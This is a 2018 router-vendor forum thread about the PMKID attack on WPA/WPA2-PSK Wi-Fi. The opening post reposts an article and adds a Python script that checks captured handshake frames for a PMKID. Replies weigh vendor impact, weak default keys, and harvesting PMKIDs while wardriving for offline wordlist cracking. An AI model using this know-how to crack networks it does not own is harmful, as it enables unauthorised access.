Nefraim
just joined
Topic Author
Posts: 8
Joined: Fri Apr 13, 2018 10:01 pm

New Attack on WPA/WPA2 Discovered, Most Modern Routers Might be at Risk

Mon Aug 06, 2018 5:57 pm

Researchers have accidentally discovered a new attack on the wi-fi protected access protocols used in wireless access points that makes it easier for outsiders to capture access credentials.
The new attack captures the Pairwise Master Key Identifier (PMKID) and - according to the Hashcat password recovery utility developers that devised it - works against 802.11i/p/q/r networks with roaming functions enabled, which covers most modern routers.

What is the difference between the new attack and previous WPA/WPA2 cracks?
According to Hashcat developer Jen “Atom” Steube, the most significant difference between older attacks and the newly discovered method is that an attacker no longer needs another user to be on the targeted network to capture credentials. The only thing needed is the initiation of the authentication process.

The researcher also added that earlier WPA/WPA2 attacks were more challenging to carry out, because “in the past the attacker had to record the WPA four-way handshake to launch an offline attack”. This may sound easy but in fact this type of attack can create a lot of trouble from a technical perspective.


The new attack is much easier to pull off, because “if you receive the PMKID from the access point, you will be able to get into the network if you can guess the [WPA] pre-shared key (PSK)“.

Depending on the length and complexity of the pre-shared key, the success of the attack may vary. It should be noted that most users don’t have the technical capacity to change the PSK on their routers and generally use the manufacturer generated key. This becomes a premise for attackers to guess the key. The cracking of such a password becomes even easier with manufacturers creating PSKs following a pattern that can be traced back to the make of the routers.

In a nutshell, here’s why this attack is much better than previous techniques:

– No more regular users required – because the attacker directly communicates with the AP (aka “client-less” attack)
– No more waiting for a complete 4-way handshake between the regular user and the AP
– No more eventual retransmissions of EAPOL frames (which can lead to uncrackable results)
– No more eventual invalid passwords sent by the regular user
– No more lost EAPOL frames when the regular user or the AP is too far away from the attacker
– No more fixing of nonce and replaycounter values required (resulting in slightly higher speeds)
– No more special output format (pcap, hccapx, etc.) – final data will appear as regular hex encoded string


Who is affected?
At this time, the researchers are not sure for which vendors or for how many routers this technique will work, but they definitely think it will work against all 802.11i/p/q/r networks with roaming functions enabled. Shortly put, this means most modern routers.

My post is just a repost from here https://sensorstechforum.com/attack-wpa ... n-routers/
Also more info can be found here https://hashcat.net/forum/thread-7717.html and here https://www.itnews.com.au/news/new-wi-f ... eds-499659

Guess it's time for Mikrotik to try to find if they are vulnerable and what can they do.

Just another reason we need WPA3 sooner.
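The attack above only works when message 1 of the 4-way handshake carries an RSN PMKID KDE. The following Python is an added example (not from the article, the hashcat thread, or MikroTik) that parses an EAPOL-Key frame and reports whether that KDE is present, so an administrator can check a capture from their own AP; the frame, nonce and PMKID value are constructed samples.

```python
"""Check whether an AP's EAPOL-Key message 1 carries a PMKID KDE (defender-side check)."""
import struct
from typing import Optional

# KDE header per IEEE 802.11-2016 Table 12-6: type 0xDD, OUI 00-0F-AC, data type 4 = PMKID
KDE_TYPE = 0xDD
RSN_OUI = b"\x00\x0f\xac"
KDE_PMKID = 4
KEY_INFO_ACK, KEY_INFO_MIC = 0x0080, 0x0100

def find_pmkid(key_data: bytes) -> Optional[bytes]:
    """Walk the Key Data KDE list and return the 16-byte PMKID if one is present."""
    i = 0
    while i + 2 <= len(key_data):
        kde_type, length = key_data[i], key_data[i + 1]
        if kde_type == 0x00:                  # zero padding after the last KDE
            break
        payload = key_data[i + 2:i + 2 + length]
        if (kde_type == KDE_TYPE and len(payload) == 20
                and payload[:3] == RSN_OUI and payload[3] == KDE_PMKID):
            return payload[4:20]
        i += 2 + length
    return None

def inspect_eapol_key(frame: bytes) -> dict:
    """Parse an 802.1X EAPOL-Key frame (802.11/LLC headers stripped) and report PMKID presence."""
    version, ptype, body_len = struct.unpack("!BBH", frame[:4])
    if ptype != 3:                            # 802.1X packet type 3 = EAPOL-Key
        raise ValueError("not an EAPOL-Key packet")
    body = frame[4:4 + body_len]
    if len(body) < 95:                        # fixed EAPOL-Key fields up to Key Data Length
        raise ValueError("EAPOL-Key body truncated")
    key_info = struct.unpack("!H", body[1:3])[0]
    # Message 1 of the 4-way handshake: Key ACK set, Key MIC clear
    is_msg1 = bool(key_info & KEY_INFO_ACK) and not (key_info & KEY_INFO_MIC)
    key_data_len = struct.unpack("!H", body[93:95])[0]
    pmkid = find_pmkid(body[95:95 + key_data_len])
    return {"is_msg1": is_msg1, "pmkid": pmkid.hex() if pmkid else None}

def build_msg1(key_data: bytes) -> bytes:
    """Build a minimal EAPOL-Key message 1 (constructed sample, not a real capture)."""
    body = (b"\x02" + struct.pack("!H", 0x008A) + struct.pack("!H", 16)
            + (1).to_bytes(8, "big")          # replay counter
            + bytes(range(32))                # ANonce (constructed)
            + bytes(48)                       # key IV, RSC, key ID, MIC: all zero in message 1
            + struct.pack("!H", len(key_data)) + key_data)
    return struct.pack("!BBH", 2, 3, len(body)) + body

# Constructed PMKID; a real one is the first 128 bits of HMAC-SHA1(PMK, "PMK Name" | AA | SPA)
SAMPLE_PMKID = bytes.fromhex("00112233445566778899aabbccddeeff")
SAMPLE_KDE = bytes([KDE_TYPE, 20]) + RSN_OUI + bytes([KDE_PMKID]) + SAMPLE_PMKID

if __name__ == "__main__":
    print(inspect_eapol_key(build_msg1(SAMPLE_KDE)))   # PMKID present: precondition for the attack
    print(inspect_eapol_key(build_msg1(b"")))          # no PMKID KDE in message 1
```

A PMKID in message 1 of a WPA2-PSK handshake is the precondition the article describes; if your AP never includes it, the client-less capture does not apply, and in either case PSK length is what decides the offline guessing cost.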
 
Samot
Member Candidate
Posts: 113
Joined: Sat Nov 25, 2017 10:01 pm

Re: New Attack on WPA/WPA2 Discovered, Most Modern Routers Might be at Risk

Mon Aug 06, 2018 8:41 pm

This is a vague article that tells us nothing. Sure they found a flaw but was it a fluke? Was it isolated? Who knows really because it seems they've done nothing more but find it on the equipment they were using/testing and it was a mistake that they found it. They did not provide any information on the environments in which they found this issue. What version of software was being run, nothing.

So let us recap. If someone gets the PMKID then they *could possibly* guess the shared-key and get in. OK, so basically "If they guess your password, they win". Then they can't tell us what vendors or models this technique will work against. That means no real testing or anything on this. Follow that up with they *THINK* it might work against 802.11i/p/q/r networks. So again, no real testing.

How should any of us handle this? Doesn't matter which router you are using or who made it, what are we to do with this article? It provides not a single bit of information on how to stop it, to see if you're open to this method or anything of real value. Have they informed vendors such as Mikrotik, Cisco, etc? I don't see any of them making waves about this yet. All I've seen is some tech blogs and reddit posts. When people start posting and spreading every little article about "hacks" that have no real substance to them outside of "most modern routers" it can cause unneeded panic and cause people to start doing stupid things to "protect" themselves.
 
nexact
just joined
Posts: 2
Joined: Tue Aug 07, 2018 11:22 pm

Re: New Attack on WPA/WPA2 Discovered, Most Modern Routers Might be at Risk

Wed Aug 08, 2018 2:56 pm

I've just tested it and it worked on my basic wireless network with EAP-PSK enabled. I'm running RouterOS v6.41rc44.
Last edited by nexact on Fri Aug 10, 2018 7:06 pm, edited 1 time in total.
 
Davis
Member Candidate
Posts: 117
Joined: Mon Aug 01, 2011 12:27 pm
Location: Latvia, Riga

Re: New Attack on WPA/WPA2 Discovered, Most Modern Routers Might be at Risk

Thu Aug 09, 2018 12:04 am

It would be great to get an official response from MikroTik whether RouterOS is affected by this bug (sending PMKID for PSK networks).
And what are the plans for fixing this in case RouterOS is affected?

Although most likely this attack doesn't improve cracking speed, it greatly increases attack surface (as it does not require any clients to be connected when obtaining the password hashes).

P.S. There is a duplicate post about this issue.
 
BartoszP
Forum Guru
Posts: 2880
Joined: Mon Jun 16, 2014 1:13 pm
Location: Poland

Re: New Attack on WPA/WPA2 Discovered, Most Modern Routers Might be at Risk

Thu Aug 09, 2018 8:24 am

Davis,
Is ROS affected? IMHO it is a stupid question.
If Mikrotik implements and follows the WiFi standard, and the standard is affected, then this "flaw in design" is implemented in current ROS.

What, in your opinion, should be done? Change the WiFi implementation to not follow the standard?
 
strods
MikroTik Support
Posts: 1624
Joined: Wed Jul 16, 2014 7:22 am
Location: Riga, Latvia

Re: New Attack on WPA/WPA2 Discovered, Most Modern Routers Might be at Risk

Thu Aug 09, 2018 10:41 am

Please see this forum topic regarding discussed WPA2-PSK brute force attack method:

viewtopic.php?f=21&t=137838
 
usdmatt
Frequent Visitor
Posts: 52
Joined: Tue Oct 29, 2013 6:18 pm

Re: New Attack on WPA/WPA2 Discovered, Most Modern Routers Might be at Risk

Thu Aug 09, 2018 11:19 am

Do I really understand this correctly, that when connecting to a router with one of these roaming protocols enabled, it sends out a hash which can be brute-forced to retrieve the PSK? Did no-one making the specs think this might be a problem? It's surprising it took this long to find considering the number of people who must have worked on implementing software for these protocols.

It should be noted that most users don’t have the technical capacity to change the PSK on their routers and generally use the manufacturer generated key. This becomes a premise for attackers to guess the key. The cracking of such a password becomes even easier with manufacturers creating PSKs following a pattern that can be traced back to the make of the routers.

We go through quite a few TP-Link routers as our basic home router. Before we reconfigure these, they come configured with network TP-Link_ABCD, and a fixed length key made up of numbers. Brute-forcing these would take minutes, and probably not much longer for any other manufacturer or broadband provider using fixed format keys.
 
Davis
Member Candidate
Posts: 117
Joined: Mon Aug 01, 2011 12:27 pm
Location: Latvia, Riga

Re: New Attack on WPA/WPA2 Discovered, Most Modern Routers Might be at Risk

Thu Aug 09, 2018 11:25 am

Is ROS affected? IMHO it is a stupid question.
If Mikrotik implements and follows the WiFi standard, and the standard is affected, then this "flaw in design" is implemented in current ROS.
Isn't PMKID sending beneficial only for EAP (so there is no need to send it for PSK networks)?

What, in your opinion, should be done? Change the WiFi implementation to not follow the standard?
Wasn't this exactly the thing done to mitigate KRACK vulnerabilities?
 
laverdiy
Trainer
Posts: 4
Joined: Mon Jun 05, 2017 11:01 pm

Re: New Attack on WPA/WPA2 Discovered, Most Modern Routers Might be at Risk

Thu Aug 16, 2018 7:24 pm

Hi,

I confirm this to be a problem, as experienced on two different RB951Ui-2HnD (versions 6.42.5 and 6.42.6), both running CAPsMAN. I tend to agree that a very strong PSK solves the issue but the way I see it, it could make wardriving an allegedly fun hobby again. The process is much faster than having to deauth legit clients and wait for handshakes. You could harvest a large amount of PMKIDs driving by, and brute force them offline later on. With a "rockyou.txt" type wordlist, the success rate could be interesting on a large scale harvest.
